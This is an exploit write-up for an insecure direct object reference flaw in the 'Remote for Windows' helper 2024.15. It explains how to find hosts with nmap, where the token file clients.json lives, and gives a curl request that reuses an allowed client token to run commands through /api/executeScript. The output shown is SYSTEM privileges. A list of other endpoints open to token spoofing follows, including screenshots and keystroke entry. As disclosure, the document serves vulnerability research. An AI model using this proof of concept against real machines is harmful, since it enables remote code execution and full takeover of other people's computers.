# Exploit Title: Remote for Windows 2024.15 (helper) - Insecure Direct Object Reference (IDOR) # Date: 2025-06-13 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://rs.ltd # Software Link: https://rs.ltd/latest.php?os=win # Version: 2024.15 # Tested on: Windows 10/11 with Remote for Windows (helper) # Identification: nmap -p- -T4 --script ssl-cert Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US Vulnerability Summary Remote for Windows Helper 2024.15 contains an Insecure Direct Object Reference (IDOR) vulnerability. Attackers can access privileged API functions by reusing any "Allowed" client token from clients.json without authentication, leading to full system compromise. "C:\Windows\System32\config\systemprofile\AppData\Roaming\Remote for Windows\clients.json" [ { "Identifier": "1337", "Name": "attacking", "Model": "iPhone", "Allowed": false, "LastAccess": 1749763038698 }, { "Identifier": "8F5E0017-408E-4996-B698-0BB93D022409", "Name": "iPhone", "Model": "iPhone10,5", "Allowed": true, "LastAccess": 1749807277127 } ] POC: curl -k -X GET "https://192.168.8.105:49988/api/executeScript" -H "X-ClientToken: 8F5E0017-408E-4996-B698-0BB93D022409" -H "X-HostName: apple iMac" -H "X-HostFullModel: iMac17,1" -H "X-Script: whoami" -H "X-ScriptName: exploit" -H "X-ScriptDelay: 0" | jq % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 48 100 48 0 0 206 0 --:--:-- --:--:-- --:--:-- 206 { "result": "nt authority\\system\r\n", "error": "" } All endpoints are vulnerable to token spoofing: /api/listApps /api/rightMouseClick /api/middleMouseClick /api/executeScript /api/listPendingScripts /api/listCustomActions /api/leftMouseStatus={0,1} /api/cancelPendingScript= /api/getCursorLocation /api/getScreenshot /api/enterString= /api/getActionIcon= /api/appIcon= /api/setInputSource=